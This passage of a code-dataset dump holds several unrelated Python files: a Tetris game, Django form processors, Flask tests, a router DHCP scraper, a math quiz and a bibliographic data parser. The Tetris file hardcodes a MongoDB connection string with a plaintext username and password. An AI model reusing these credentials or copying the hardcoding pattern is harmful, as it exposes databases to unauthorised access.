get_box_embeddings(self, vector: torch.Tensor):\n \"\"\"\n create box embedding from vector\n shape: [batch_size, box_min/box_max, hidden_dim]\n box_min: bottom-left corner (=center-offset), box_max: top-right corner (= center+offset)\n center: (box_max+box_min)/2\n offset: (box_max-box_min)/2\n \"\"\"\n len_dim = vector.shape[-1]\n dim = -1\n\n if len_dim % 2 != 0:\n raise ValueError(f\"The last dimension of vector should be even but is {vector.shape[-1]}\")\n\n split_point = int(len_dim/2)\n # box_min: [batch_size, vector_dim/2]; [64, 256]\n box_min = vector.index_select(dim, torch.tensor(list(range(split_point)), dtype=torch.int64, device=vector.device))\n delta = vector.index_select(dim, torch.tensor(list(range(split_point, len_dim)), dtype=torch.int64, device=vector.device))\n box_max = box_min + softplus(delta, beta=1 / self.volume_temp, threshold=self.threshold)\n\n assert box_min.shape == box_max.shape\n assert (box_max >= box_min).all()\n\n return torch.stack((box_min, box_max), dim=-2) # [batch_size, 2, vector_dim/2]; [64, 2, 256]", "repo_name": "iesl/CE2ERE", "sub_path": "src/embeddings.py", "file_name": "embeddings.py", "file_ext": "py", "file_size_in_byte": 1449, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": 
[{"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.softplus", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "36649607996", "text": "import pygame\nimport pymongo\n\nfrom board import *\nfrom game import *\n# para poner sonido\nfrom pygame.locals import *\nfrom pygame import mixer\n\n# Pedir al usuario que ingrese su nombre\n\nprint(\" _______________________________________________ \")\nprint(\"| Tetris |\")\nprint(\"|_______________________________________________|\")\nname = input(\"| Usuario: \")\nprint(\"|_______________________________________________|\")\npygame.font.init()\n\n\ndef main(win): \n last_score = max_score()\n # diccionario para guardar las posiciones de las piezas que ya han caido\n locked_positions = {}\n grid = create_grid(locked_positions)\n \n change_piece = False\n run = True\n current_piece = get_shape()\n next_piece = get_shape()\n # clock para controlar los fps\n clock = pygame.time.Clock()\n fall_time = 0\n fall_speed = 0.27\n level_time = 0\n score = 0\n \n # Soundtrack\n mixer.init()\n # Para cargar el archivo de audio hay que estar en /ProyectoPython-Tetris/src/ \n mixer.music.load('utilities/crystals.mp3')\n # -1 para que se repita\n mixer.music.play(-1)\n\n # Conectarse a la base de datos\n try:\n client = pymongo.MongoClient(\"mongodb+srv://m002-student:12345@sandbox01.2yg0wjn.mongodb.net/?retryWrites=true&w=majority\")\n db = client.test\n db = client[\"Tetris\"]\n puntuaciones = db[\"usuarios\"]\n print(\"Conectado a la base de datos\")\n except:\n print(\"Error al conectarse a la base de datos\")\n\n\n while run:\n # variables fall_time y level_time para controlar el tiempo de caida de la pieza\n grid = create_grid(locked_positions)\n fall_time += clock.get_rawtime()\n level_time += clock.get_rawtime()\n # usamos clock.tick() para que el juego no vaya mas rapido de lo que queremos\n clock.tick()\n\n # Aumenta la velocidad de caida segun el tiempo\n if level_time/1000 > 5:\n level_time = 0\n if level_time > 0.12:\n level_time -= 0.005\n \n # Control de tiempo de caida de la pieza\n if fall_time/1000 > fall_speed:\n fall_time = 0\n current_piece.y += 1\n if not(valid_space(current_piece, grid)) and current_piece.y > 0:\n current_piece.y -= 1\n change_piece = True\n\n # Si se cierra la ventana se detiene el juego\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.display.quit()\n\n # Uso de pygame para teclas\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n current_piece.x -= 1\n if not(valid_space(current_piece, grid)):\n current_piece.x += 1\n if event.key == pygame.K_RIGHT:\n current_piece.x += 1\n if not(valid_space(current_piece, grid)):\n current_piece.x -= 1\n if event.key == pygame.K_DOWN:\n current_piece.y += 1\n if not(valid_space(current_piece, grid)):\n current_piece.y -= 1\n if event.key == pygame.K_UP:\n current_piece.rotation += 1\n if not(valid_space(current_piece, grid)):\n current_piece.rotation -= 1\n if event.key == pygame.K_SPACE:\n run = False\n pygame.display.quit()\n \n # se le asigna la lista de posiciones de la pieza actual\n shape_pos = 
convert_shape_format(current_piece)\n\n # recorre la pieza y asigna el color \n for i in range(len(shape_pos)):\n x, y = shape_pos[i]\n if y > -1:\n grid[y][x] = current_piece.color\n\n # se recorre posiciones de la pieza y se agrega cada una de ellas al diccionario\n if change_piece:\n for pos in shape_pos:\n p = (pos[0], pos[1])\n locked_positions[p] = current_piece.color\n current_piece = next_piece\n next_piece = get_shape()\n change_piece = False\n # se suma 10 puntos por cada fila eliminada\n score += clear_rows(grid, locked_positions) * 10\n\n draw_window(win, grid, score, last_score)\n draw_next_shape(next_piece, win)\n pygame.display.update()\n\n if check_lost(locked_positions):\n # Insertar datos en la base de datos\n puntuaciones.insert_one({ \"nombre\": name, \"puntuacion\": score})\n draw_text_middle(win, 'GAME OVER', 80, (255,255,255))\n pygame.display.update()\n pygame.time.delay(1500)\n run = False\n update_score(score)\n # se actualiza el ultimo puntaje si es mas alto\n if score > last_score:\n last_score = score\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.display.quit()\n\ndef main_menu(win): \n run = True\n while run:\n win.fill((0,0,0))\n draw_text_middle(win, 'Pulsa cualquier tecla para empezar', 50, (255,255,255))\n pygame.display.update()\n # si se presiona cualquier tecla se inicia el juego\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.KEYDOWN:\n main(win)\n\n pygame.display.quit()\n\n\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Tetris: El Jueguito')\nmain_menu(win)", "repo_name": "Jouad01/ProyectoPython-Tetris", "sub_path": "src/tetris.py", "file_name": "tetris.py", "file_ext": "py", "file_size_in_byte": 5710, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.font.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.mixer.init", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 38, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 40, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 42, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 89, "usage_type": "attribute"}, {"api_name": 
"pygame.K_DOWN", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 127, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 141, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 143, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 153, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 155, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 158, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 158, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 161, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 162, "usage_type": "attribute"}]} +{"seq_id": "11668479147", "text": "#from django import forms\n#from django.http import HttpResponseRedirect\n\nimport sys\n\nfrom django import forms\nfrom django.forms import ModelForm, Textarea\n\nfrom django.http import HttpResponseRedirect\n\nfrom mezzanine.pages.page_processors import processor_for\nfrom .models import Organization, Residency\n\nclass OrganizationForm(ModelForm):\n #about = forms.CharField(label=\"foobar\")\n print >>sys.stderr, \"organization form up top\"\n class Meta:\n print >>sys.stderr, \"organization form up top meta\"\n model = Organization\n # the form displays the field in the order of this array.\n # maybe use the pages_page.title for our name\n fields=['name', 'website', 'street_address', 'city', 'state',\n 'postal_code', 'country', 'email', 'phone', 'about' ]\n #'postal_code', 'country', 'email', 'phone', 'about']\n\n print >>sys.stderr,\"before widgets\"\n widgets = {\n 'title': Textarea(attrs={'size':'100'}),\n 'name': Textarea(attrs={'size':'1', 'rows':'1'}),\n 'about': Textarea(attrs={'cols':'150', 'rows':'8'}),\n } \n print >>sys.stderr,\"widgets\",widgets\n # i have seen examples with the numbers in quotes, and not in quotes.\n #'about': Textarea(attrs={'cols':'150', 'rows':'8'}),\n # these labels are not being used. 
The help_text from models is being\n # used.\n labels= {\n 'title':'Organization Name',\n 'name':'Organzation Name',\n 'website':'Website',\n 'street_address':'Street Address',\n 'city':'City',\n 'state':'State if applicable',\n 'postal_code':'Postal Code if applicable',\n 'country':'Country',\n 'email':'Contact Email',\n 'phone':'Phone',\n }\n #'about':'About our organization',\n #print >>sys.stderr,\"what?\"\n\n\nclass ResidencyForm(ModelForm):\n class Meta:\n model=Residency\n #exclude =['title','HEADER1','HEADER2','HEADER3']\n\n\n@processor_for('add-a-residency-opportunity')\ndef residency_form(request, page):\n print >>sys.stderr, \"in residency_form\"\n form = ResidencyForm()\n if request.method == \"POST\":\n form = ResidencyForm(request.POST)\n if form.is_valid():\n # process form, like save data\n form.save()\n redirect = request.path + \"?submitted=true\"\n return HttpResponseRedirect(redirect)\n return {\"form\": form}\n\n\n@processor_for('add-organization')\ndef organization_form(request, page):\n print >>sys.stderr, \"in organization_form\"\n form = OrganizationForm()\n print >>sys.stderr, \"after form=in organization_form\"\n if request.method == \"POST\":\n form = OrganizationForm(request.POST)\n if form.is_valid():\n # process form, like save data\n # hmmm...how do I do this? I want the pages_page.title\n # to be the name field. oh well.\n #form.cleaned_data['title'] = form.cleaned_data['name']\n form.save()\n redirect = request.path + \"?submitted=true\"\n redirect = \"/\"\n return HttpResponseRedirect(redirect)\n return {\"form\": form}\n\n\n@processor_for('list-of-organizations')\ndef organization_list(request,page):\n orglist = Organization.objects.all()\n print >>sys.stderr,\"organization_list for list-of-organizations\"\n return {\"orglist\": orglist}\n\n@processor_for('list-of-residencies')\ndef residency_list(request,page):\n print >>sys.stderr,\"residency_list for list-of-residencies\"\n reslist = Residency.objects.all()\n return {\"reslist\": reslist}\n\n@processor_for('show-residency')\ndef show_residency(request,page):\n print >>sys.stderr,\"show-residency\"\n\n slug=request.GET.get('res',None)\n print >>sys.stderr,\"slug: %r\", slug\n res=Residency.objects.filter(slug=slug)[0]\n\n org=res.organization\n return {\"residency\": res, \"org\": org}\n\n\n@processor_for('add-a-residency-opportunity')\ndef show_organization(request,page):\n orgslug=request.GET.get('org',None)\n print >>sys.stderr, \"add-a-residency-opportunity org:%r\" % orgslug\n return\n\n\n@processor_for('show-organization')\ndef show_organization(request,page):\n # this is where we could do the offer/requires formatting, but \n # I am doing it in a template_tag. 
\n #for res in reslist:\n # pass \n print >>sys.stderr,\"show-organization\"\n\n slug=request.GET.get('org',None)\n org=Organization.objects.filter(slug=slug)[0]\n\n print >>sys.stderr, \"org?\"\n print >>sys.stderr, org.name\n print >>sys.stderr, org.website\n print >>sys.stderr, org.city\n print >>sys.stderr, org.country\n reslist = Residency.objects.all()\n return {\"reslist\": reslist, \"org\":org}\n\n#### this is from the docs.http://mezzanine.jupo.org/docs/content-architecture.html\n#### basically exactly what I need :-/\n\n#from django import forms\n#from django.http import HttpResponseRedirect\n#from mezzanine.pages.page_processors import processor_for\n#from .models import Author\n\n#class AuthorForm(forms.Form):\n #name = forms.CharField()\n #email = forms.EmailField()\n#\n#@processor_for(Author)\n#def author_form(request, page):\n #form = AuthorForm()\n #if request.method == \"POST\":\n #form = AuthorForm(request.POST)\n #if form.is_valid():\n ## Form processing goes here.\n #redirect = request.path + \"?submitted=true\"\n #return HttpResponseRedirect(redirect)\n ##return {\"form\": form}\n", "repo_name": "RichGibson/hir", "sub_path": "page_processors.py", "file_name": "page_processors.py", "file_ext": "py", "file_size_in_byte": 5497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.forms.ModelForm", "line_number": 14, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Organization", "line_number": 19, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.forms.Textarea", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.forms.ModelForm", "line_number": 53, "usage_type": "name"}, {"api_name": "models.Residency", "line_number": 55, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 69, "usage_type": "call"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 88, "usage_type": "call"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Organization.objects.all", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Organization.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Organization", "line_number": 94, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 95, "usage_type": "attribute"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.Residency.objects.all", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Residency.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": 
"models.Residency", "line_number": 101, "usage_type": "name"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.Residency.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Residency.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.Residency", "line_number": 110, "usage_type": "name"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 104, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 119, "usage_type": "attribute"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.Organization.objects.filter", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Organization.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.Organization", "line_number": 132, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 134, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 135, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 136, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 138, "usage_type": "attribute"}, {"api_name": "models.Residency.objects.all", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Residency.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Residency", "line_number": 139, "usage_type": "name"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "16793744156", "text": "from django.shortcuts import render\nfrom .student_info import StudentForm\nfrom .models import StudentModel\n\n\n# Create your views here.\n\ndef student_view(request):\n # create an instance of form class\n newform = StudentForm()\n\n if request.method == 'POST':\n newform2 = StudentForm(request.POST)\n if newform2.is_valid():\n name = newform2.cleaned_data['student_name']\n course = newform2.cleaned_data['course']\n adm_no = newform2.cleaned_data['admission_no']\n\n student = StudentModel(Name=name, Course=course, Admission_No=adm_no)\n student.save()\n return render(request, 'studentsapp/index.html', {'form': newform})\n", "repo_name": "jisshub/django-forms", "sub_path": "formsprj/studentsapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "student_info.StudentForm", "line_number": 10, "usage_type": "call"}, {"api_name": "student_info.StudentForm", "line_number": 13, "usage_type": "call"}, {"api_name": "models.StudentModel", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "35172017898", "text": "# coding: utf-8\n\nfrom __future__ import absolute_import\nimport unittest\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom bill_segmentation.models.error_handle_dto import ErrorHandleDto # noqa: E501\nfrom bill_segmentation.models.img_on_server_dto import ImgOnServerDto # noqa: E501\nfrom 
bill_segmentation.models.roi_pts_dto import RoiPtsDto # noqa: E501\nfrom bill_segmentation.test import BaseTestCase\n\n\nclass TestImageProcessController(BaseTestCase):\n \"\"\"ImageProcessController integration test stubs\"\"\"\n\n def test_warp_perspective(self):\n \"\"\"Test case for warp_perspective\n\n 对图像进行透视矫正\n \"\"\"\n roi_pts_dto = {\"pts\":[{\"x\":0,\"y\":0},{\"x\":100,\"y\":0},{\"x\":100,\"y\":100},{\"x\":0,\"y\":100}]}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/bill-segmentation/warp-perspective/{bill_type_id}/{img_id}'.format(bill_type_id='bill_type_id_example', img_id='img_id_example'),\n method='POST',\n headers=headers,\n data=json.dumps(roi_pts_dto),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_warp_segmentation(self):\n \"\"\"Test case for warp_segmentation\n\n 分割指定图像\n \"\"\"\n headers = { \n 'Accept': 'application/json',\n }\n response = self.client.open(\n '/bill-segmentation/warp-segmentation/{bill_type_id}/{img_id}'.format(bill_type_id='bill_type_id_example', img_id='img_id_example'),\n method='GET',\n headers=headers)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "hustrlee/bill-segmentation", "sub_path": "server/bill_segmentation/test/test_image_process_controller.py", "file_name": "test_image_process_controller.py", "file_ext": "py", "file_size_in_byte": 1888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bill_segmentation.test.BaseTestCase", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 32, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "1727350053", "text": "### Simple way to scrape list of ips and macs from RV042 firmware 1.3.12.19-tm.\n### You will need the html with the information.\nimport re\nfrom jinja2 import Template, Environment, FileSystemLoader\n\n#return a vector with dictionaries which contain ip, mac, hostname\ndef scrapper(file):\n out=[]\n for line in file:\n if re.search(\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3} =>\", line):\n dic={}\n dic['ip']=(re.search(\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\",line).group(0))\n dic['mac']=(re.search(\"([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2})\",line).group(0)).replace('-',':')\n dic['name']=(re.search(\" 1 .{1,15}'>\",line).group(0)[2:-2])\n out.append(dic)\n return out \n\n#function to create the file using Jinja2 templates\ndef generater(dic):\n outfile=open('out.txt','w')\n env = Environment(loader=FileSystemLoader('.'))\n template = env.get_template('template.txt') \n with open('ipmacname.txt', 'w') as f:\n f.write(template.render(data=dic))\n\ndef main():\n filename='dhcp_setup.htm'\n file=open(filename,'r')\n dic=scrapper(file)\n generater(dic)\n \nmain()", "repo_name": "davirussi/RV042", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1135, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.search", "line_number": 10, "usage_type": "call"}, {"api_name": "re.search", "line_number": 12, "usage_type": "call"}, {"api_name": "re.search", "line_number": 13, 
"usage_type": "call"}, {"api_name": "re.search", "line_number": 14, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 21, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "7069079424", "text": "import argparse\nfrom math_test import *\n\nparser = argparse.ArgumentParser(\"mentalm\", description=\"Mental math tester\", \n\tepilog=\"Created by Daniel J. Perry (BioBox)\")\nparser.add_argument('-cfg', default=\"default.ini\", \n\thelp=\"ini file for your settings. the defualt is default.ini\")\n\nargs = parser.parse_args()\n\nclass CLIMathTest(MathTest):\n\t\"\"\"A MathTest implementation in the terminal\"\"\"\n\tdef __init__(self, config_file):\n\t\tsuper(CLIMathTest, self).__init__(config_file)\t\t\n\n\tdef display_question(self, i):\n\t\tprint(\"\\nQuestion #{}: {} = \".format(i+1, self.questions[i]), end='')\n\n\tdef get_input(self):\n\t\tuser_input = input()\n\t\tif user_input.capitalize() == 'Q':\n\t\t\tself.quit = True\n\t\t\treturn user_input\n\n\t\ttry:\n\t\t\treturn int(user_input)\n\t\texcept ValueError:\n\t\t\tprint(\"Please input a number: \", end='')\n\t\t\treturn self.get_input()\n\n\tdef end_test(self):\n\t\tans = self.answers\n\t\twrong_ans = [i+1 for i,ans in enumerate(ans) if self.u_answers[i] != ans]\n\t\tlen_wrong = len(wrong_ans)\n\n\t\tprint()\n\t\tif self.quit:\n\t\t\tprint(\"TEST ABORTED.\\n\")\n\n\t\tif len_wrong == 0:\n\t\t\tif not self.quit:\n\t\t\t\tprint(\"You got a perfect score. Congratulations!\")\n\t\telif len_wrong == 1:\n\t\t\tprint(\"You got number \", wrong_ans[0], \" wrong.\")\n\t\telse:\n\t\t\tprint(\"You got {} wrong. They are numbers \".format(len_wrong), end='')\n\t\t\tprint(*wrong_ans[:len_wrong-1], sep=', ', end='')\n\t\t\tprint(', and ', wrong_ans[len_wrong-1])\n\n\nmath_test = CLIMathTest(args.cfg)\n\nprint(\"This test is {} questions long.\".format(math_test.numq))\nprint(\"Press ENTER to start the test...\", end='')\ninput()\nmath_test.start()\n", "repo_name": "BioBox/mentalm", "sub_path": "mentalm/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 4, "usage_type": "call"}, {"api_name": "math_test.numq", "line_number": 53, "usage_type": "attribute"}, {"api_name": "math_test.start", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "71788763714", "text": "import logging\nfrom typing import Any, List, Dict, Optional\n\nimport pandas as pd # type: ignore\nfrom pydantic import BaseModel\nfrom wikibaseintegrator import wbi_config # type: ignore\n\nimport config\nfrom models.swepub.affiliation import SwepubAffiliation\n\nwbi_config.config['USER_AGENT'] = config.user_agent\nlogger = logging.getLogger(__name__)\n\n\nclass SwepubContributor:\n \"\"\"This models the contributor aka author in the Swepub raw_data\"\"\"\n given_name: Optional[str] = None\n family_name: Optional[str] = None\n affiliations: List[SwepubAffiliation]\n orcid: Optional[str] = None\n local_identifier: Optional[str] = None\n\n def __init__(self, person_data: Any = None):\n if person_data is None:\n raise ValueError(\"instance of was None\")\n else:\n self.affiliations = []\n self.__parse__(person_data)\n\n def __parse__(self, contributor_data):\n if contributor_data is None:\n raise ValueError(\"raw_data was None\")\n # pprint(person)\n if \"agent\" in contributor_data:\n # This designates 
the role of the agent\n agent = contributor_data[\"agent\"]\n if \"@type\" in agent:\n affiliation_type = agent[\"@type\"]\n if affiliation_type == \"Person\":\n if \"givenName\" in agent:\n self.given_name = agent[\"givenName\"]\n else:\n logger.debug(f\"givenName was not found in agent {agent}\")\n if \"familyName\" in agent:\n self.family_name = agent[\"familyName\"]\n else:\n logger.debug(f\"familyName was not found in agent {agent}\")\n if \"identifiedBy\" in agent:\n identifiers: List[Dict[Any]] = agent[\"identifiedBy\"]\n for identifier in identifiers:\n if \"@type\" in identifier:\n identifier_type = identifier[\"@type\"]\n value = identifier[\"value\"]\n if identifier_type == \"Local\":\n # these seem useless because they cannot easily be resolved to\n # anything and are specific to every swedish research institution\n self.local_identifier = value\n elif identifier_type == \"ORCID\":\n self.orcid = value\n else:\n logger.debug(f\"unsupported identifier {identifier_type} in swepub agent\")\n elif affiliation_type == \"Organization\":\n # print(\"agent:\")\n # pprint(agent)\n self.affiliations.append(SwepubAffiliation(affiliation=agent))\n else:\n logger.debug(f\"unsupported affiliation type {affiliation_type} in swepub agent\")\n if \"hasAffiliation\" in contributor_data:\n # This affiliation is not linked to a person. Why? Bad raw_data?\n affiliations_data = contributor_data[\"hasAffiliation\"]\n # print(\"hasaffiliation:\")\n # pprint(affiliation)\n # exit(0)\n for affiliation_data in affiliations_data:\n affiliation = SwepubAffiliation(affiliation=affiliation_data,\n linked_to_person=False)\n # Unnest the subaffiliations\n if affiliation.has_subaffiliation and affiliation.subaffiliations is not None:\n for subaffiliation_data in affiliation.subaffiliations:\n subaffiliation = SwepubAffiliation(subaffiliation_data,\n linked_to_person=False)\n self.affiliations.append(\n subaffiliation\n )\n # Save memory by deleting the json raw_data\n affiliation.subaffiliations = None\n self.affiliations.append(\n affiliation\n )\n # exit(0)\n\n def full_name(self):\n return f\"{self.given_name} {self.family_name}\"\n\n def export_dataframe(self):\n if len(self.affiliations) == 0:\n affiliations = None\n else:\n affiliations = self.affiliations\n data = dict(\n affiliation=affiliations,\n full_name=self.full_name(),\n orcid=self.orcid,\n local_identifier=self.local_identifier,\n )\n # The list around raw_data is needed because we have scalar values\n return pd.DataFrame(data=[data])\n", "repo_name": "dpriskorn/SwePub2Python", "sub_path": "models/swepub/contributor.py", "file_name": "contributor.py", "file_ext": "py", "file_size_in_byte": 4783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "wikibaseintegrator.wbi_config.config", "line_number": 11, "usage_type": "attribute"}, {"api_name": "wikibaseintegrator.wbi_config", "line_number": 11, "usage_type": "name"}, {"api_name": "config.user_agent", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, 
